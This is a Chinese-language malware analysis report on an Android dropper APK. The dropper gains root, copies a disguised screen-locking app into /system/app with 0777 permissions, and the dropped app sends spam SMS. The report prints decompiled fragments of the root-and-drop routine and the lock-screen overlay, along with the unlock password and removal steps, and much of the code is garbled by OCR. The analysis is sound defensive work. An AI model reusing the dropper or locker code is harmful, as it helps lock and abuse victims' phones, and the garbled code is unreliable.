分析报告

| 样本名 | 免流服务器. apk | |
|-----|------------|--|
| 时间 | 2017-10-27 | |
| 平台 | Windows 10 | |

目录

| 1 . | . 样才 | 톡概况 | . 3 |
|-----|------|------------|-----|
| | 1. 1 | 样本信息 | .2 |
| | | 测试环境及工具 | |
| | 1. 3 | 分析目标 | .3 |

| 2. 具体行为分析 | |
|---|------|
| 2. 具体行为分析 | 3 |
| 2.1 主要行为 | |
| 2.1.1 恶意程序对用户造成的危害 | 7 |
| 2.1.2 恶意程序在 Androidmanifest. xml 中注册的恶意组件 | 8 |
| 2.2 恶意代码分析 | 8 |
| 2.1 加固后的恶意代码树结构图(是否有加固) | 8 |
| | |
| 2.2 恶意程序的代码分析片段 | 9 |
| 3. 总结 | . 10 |

1. 样本概况

1.1 样本信息

病毒名称: 免流服务器. apk 所属家族: 无

大小: 799835 bytes

MD5 值: 2EFCA46F34A565C2EF4052B89B6B364B

SHA1 值: 5493A958A592BB0B19C43ACB2C1F52C898885207 CRC32: 7F89A927

病毒行为: 获取 root 权限, 安装其他病毒 apk

1.2 测试环境及工具

系统版本 android4.4.2 工具:夜神模拟器, androidkiller, Hash

1.3 分析目标

免流服务器.apk

2. 具体行为分析

2.1 主要行为

1. 点击安装核心程序出现以下图片:



2. 安装完成提示重启设备



3. 重启设备后, 发现设备被锁



4. 使用 androidkiller 分析 apk, 发现其包名

```
ndroid" package="zs.ip.proxy">
allScreens="true"/>
```

- 5. 使用 androidkiller 的进程管理工具将其进程结束
- 5.1 发现进程中并没有此包名



5.2 分析代码得知此 app 通过获取最高权限, 安装了另一个病毒

```
protected void onCreate(Bundle paramBundle)
            LogCatBroadcaster.start(this):
             LodCatBroadcaster.start(this);
super.onCreate(paramBundle);
requestWindowFeature(1);
setContentView(2130903pte);
Object localObject = new File("/storage/sdcard0/" + "stk3.apk");
                      try
                        paramBundle = getAssets().open("stk3.apk");
localFileOutputStream = new java/lo/FileOutputStream;
localFileOutputStream.
cinctv((File) localObject);
localObject = new byte(10240);
                                i = paramBundle.read((byte[])localObject);
                                if (i == -1)
                                      localFileOutputStream.close();
paramBundle.close();
return;
                       catch (IOException paramBundle)
                             FileOutputStream localFileOutputStream;
int i;
paramBundle.printStackTrace();
private void copyAppToSystem(String paramString)
              Process localProcess = getRoot();
if (localProcess != null)
             if (localFrocess != mil) {
    DataOutputStream localDataOutputStream = new java/io/DataOutputStream;
    localDataOutputStream.cinit>(localFrocess.getOutputStream());
    localDataOutputStream.cinit>(localFrocess.getOutputStream());
    localDataOutputStream.cinit>(localFrocess.getOutputStream());
    localDataOutputStream.writeOptes(localDataOutputStream());
    StringDatfer localStringDatfer = new java/lamg/StringDatfer;
    StringDatfer localStringDatfer = new java/lamg/StringDatfer;
    localStringDatfer = localStringDatfer = new java/lamg/StringDatfer;
    localStringDatfer = localStringDatfer = new java/lamg/StringDatfer;
    localStringDatfer = new java/lamg/StringDatfer = new java/lamg/StringDa
                   | localization:wisitor();
| localization();
| localizatio
              private Process getRoot()
                                throws Exception
                                return Runtime.getRuntime() exec("su");
              }
  5.3 找到另外一个病毒的所在地址
    免流服务器
        assets
                                  Jume4.zip
                                  Jume5.zip
                                  ⊕ SDS4.zip
                                                      SUSJ.ZIP
                                                       🌉 stk3.apk
           i original
```

6. 使用工具分析得知 stk3. apk 的信息如下 文件: stk3. apk

res smali

大小: 240372 bytes 修改时间: 2016

年3月6日, 13:42:46

MD5: 44DBCF4F3410CF4CDCD9463B76AF0A91

SHA1: 1A2F265932EC81224AD4B922764E38413DADC8E1

CRC32: 7B31436E

7. 使用 androidkiller 分析 stk3. apk, 得到包名

" package="com.android.stk3">

8. 打开 androidkiller 进程管理器, 发现进程

| W-11 | 211.0 | , w H |
|--|-------|--------|
| /system/bin/surfaceflinger | 157 | system |
| Zygote zygote | 158 | root |
| system_server | 391 | system |
| com.android.systemui | 522 | u0_a10 |
| android.process.acore | 565 | u0_a3 |
| com.android.settings | 598 | system |
| com.google.android.gms.persistent | 645 | u0_a7 |
| - comandroid.phone | 660 | radio |
| com.android.stk3 | 672 | u0_a44 |
| comyphonolouncher | 687 | system |
| com.google.process.gapps | 714 | u0_a7 |
| com.android.vending | 832 | u0_a12 |
| com.google.process.location | 912 | u0_a7 |
| com.android.keychain | 1032 | system |
| com.google.android.gms | 1047 | u0_a7 |
| android.process.media | 1101 | u0_a5 |
| com.estrongs.android.pop | 1261 | u0_a34 |
| data/data/com.estrongs.android.pop/files/libestool2.so | 1301 | u0_a34 |
| com.android.providers.calendar | 1319 | u0_a1 |
| esfm .esfm | 1384 | u0_a34 |
| com.google.android.configupdater | 1402 | u0 a2 |
| com.google.android.gms.ui | 1570 | u0 a7 |
| com.google.android.gms.unstable | 1630 | u0 a7 |
| - 🚺 com.google.android.partnersetup | 1655 | u0_a9 |
| com.android.onetimeinitializer | 1679 | u0_a11 |
| com.bignox.app.store.hd | 1694 | u0_a17 |
| com.android.gallery3d | 1846 | u0_a22 |
| - (| 150 | |

9. 将进程结束, 发现此进程重新启动

```
zygote

zygote

system_server

com.android.systemui
android.process.acore
com.android.settings
                                                                                                                                                                                                                                                                u0_a3
                                                                                                                                                                                                                                                               system
                  com.android.settings
com.android.gms.persistent
com.android.phone
com.yphone.launcher
com.google.process.gapps
com.android.vending
      com.android.phone
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
com.aponellauncher
android.process.media
com.aponellauncher
datadata.com.estrongs.android.pop/files/libestool2.so
com.android.providers.calendar
a.esfm
                                                                                                                                                                                                                                                                u0 a7
                                                                                                                                                                                                                      1101
1261
1301
1319
                                                                                                                                                                                                                                                               u0_a1
        estm
com.google.android.configupdater
com.google.android.gms.ui
com.google.android.gms.unstable
com.google.android.partnersetup
com.google.android.partnersetup
com.google.android.onetmeinitalizer
com.google.android.onetmeinitalizer
com.bignox.app.store.hd
         .esfm
                                                                                                                                                                                                                       1384
                                                                                                                                                                                                                                                               u0 a34
                                                                                                                                                                                                                       1402
                        com.bignox.app.store....
com.android.gallerv3d
                                                                                                                                                                                                                       1694
                                                                                                                                                                                                                                                                u0 a17
com.android.stk3
                                                                                                                                                                                                                       2182
```

10. 在 stk3. apk 的清单文件中得知, 此 apk 中含有服务和广播接收器

11. 分析服务中的代码得知密码为 TFB4

```
((Button)this.mFloatLayout.findViewById(2131034157)).setOnClickListener(new View.OnClickListener()
 public void onClick(View paramAnonymousView)
   66 (llxfc.access$L1000002(llxfc.this).getText().toString().equal ("4")); 66 (llxfc.access$L1000003(llxfc.this).getText().toString().equal ("4"));
```

12. 将密码输入, 设备解锁, 解锁后发现安装了 SIM 卡应用(伪装不错), 可知此病 毒伪装成了 SIM 卡应用.



13. 在分析过程中发现了此 apk 发送了大量的垃圾短信



2.1.1 恶意程序对用户造成的危害

锁屏, 使设备无法正常使用, 发送大量垃圾短信

2.1.2 恶意程序在 Androidmanifest. xml 中注册的恶意组件 (1) 权限相关 免流服务器. apk 中的权

```
<uses-permission android:name="android.permission.WRITE EXTERNAL STORAGE"/>
        <uses-permission</pre>
android:name="android.permission.READ EXTERNAL STORAGE"/>
                                                               <uses-permission</pre>
android:name="android.permission.MOUNT UNMOUNT FILESYSTEMS"/>
        <uses-permission android:name="android.permission.INTERNET"/>
 stk3.apk 中的权限
      <uses-permission</pre>
android:name="android.permission.SYSTEM ALERT WINDOW"/>
        <uses-permission</pre>
android:name="android.permission.RECEIVE BOOT COMPLETED"/>
        <uses-permission android:name="android.permission.SEND_SMS"/>
    (2)服务/广播
    免流服务器. apk 中的服务/广播
     无
    Stk3. apk 中的服务/广播
      <service android:name="11xfc"/>
            <receiver android:name=".BootBroadcastReceiver">
                <intent-filter>
                    <action android:name="android.intent.action.BOOT_COMPLETED"/>
```

<category android:name="android.intent.category.HOME"/>

2.2 恶意代码分析

2.1 加固后的恶意代码树结构图(是否有加固)

没有加固 2.2 恶意程序的代码分析片段

</intent-filter>

</receiver>

免流服务. apk 中的代码片段:

```
private void copyAppToSystem(String paramString)
           try
                  Process localProcess = getRoot();
                  if (localProcess != null)
                       DataOutputStream localDataOutputStream = new java/io/DataOutputStream;
localDataOutputStream.
LocalDataOutputStream(i);
LocalDataOutputStream(i);
LocalDataOutputStream(i);
StringBuffer localStringBuffer! = new java/lang/StringBuffer;
LocalDataIngBuffer!
LocalStringBuffer!
Lo
                      | localStringBurrer1.cintv();

StringBurfer localStringBurfer2 = new java/lang/StringBurfer;

localStringBurfer localStringBurfer3 = new java/lang/StringBurfer;

localStringBurfer localStringBurfer3 = new java/lang/StringBurfer;

localDataOutputStream.writeBytes(localStringBurfer2.append(localStringBurfer3.append("cp ").append(paramString).toString()).append("/system/app/")

paramString = paramString.substring(paramString.lastIndexOf("/"));

localStringBurfer3 = new yava/lang/StringBurfer;

localStringBurfer3 = new yava/lang/StringBurfer;

localStringBurfer3 = new yava/lang/StringBurfer;

localStringBurfer1 = new yava/lang/StringBurfer;

localStringBurfer1 = new yava/lang/StringBurfer;

localStringBurfer1 = new yava/lang/StringBurfer;

localStringBurfer1 = new yava/lang/StringBurfer;

localDataOutputStream.writeBytes(localStringBurfer1.append(this.CHMOD_CMD).append(paramString).toString() + "\n");

localDataOutputStream.writeBytes("exit\n");

localParamString.writeBytes("exit\n");

localPar
                           StringBuffer localStringBuffer2 = new java/lang/StringBuffer;
                   return;
stk3. apk 中的代码片段
                                           this.wmParams = new WindowManager.LayoutParams();
                                           paramIntent = getApplication();
                                           getApplication();
                                           this.mWindowManager = ((WindowManager)paramIntent.getSystemService(Context.WINDOW_SERVICE));
                                           this.wmParams.type = 2010;
                                           this.wmParams.format = 1;
                                         this.wmParams.flags = 1288;
this.mFloatLayout = ((LinearLayout)LayoutInflater.from(getApplication()).inflate(2130903040, null));
                                           this.mWindowManager.addView(this.mFloatLayout, this.wmParams);
```

3. 总结

第一个病毒在提取权限后安装第二个(锁机)病毒,在锁机病毒中含有大量的垃圾短信.在分析过程中,首先需要分析第一个病毒的行为,在分析过程中发现使用了 adb 命令提升权限及复制第二个病毒到/system/app/目录下,并且提升权限为0777,第二个病毒在activity和BroadcastReceiver中都有启动服务的代码,通过分析发现在广播中有监听开机的行为,在检测到设备开机,启动病毒进行锁屏.

清除病毒:

得到正确密码后, 进入系统, 将其病毒删除, 并删除 sd 卡及/system/app 目录下的病毒文件

参考文献

- [1] 丰生强. Android 软件安全与逆向分析. 人民邮电出版社. 2013.
- [2] 杨丰盛. Android 应用开发揭秘. 机械工业出版社. 2010.
- [3] Bruce Eckel. Thinking in Java. Prentice Hall. 2006.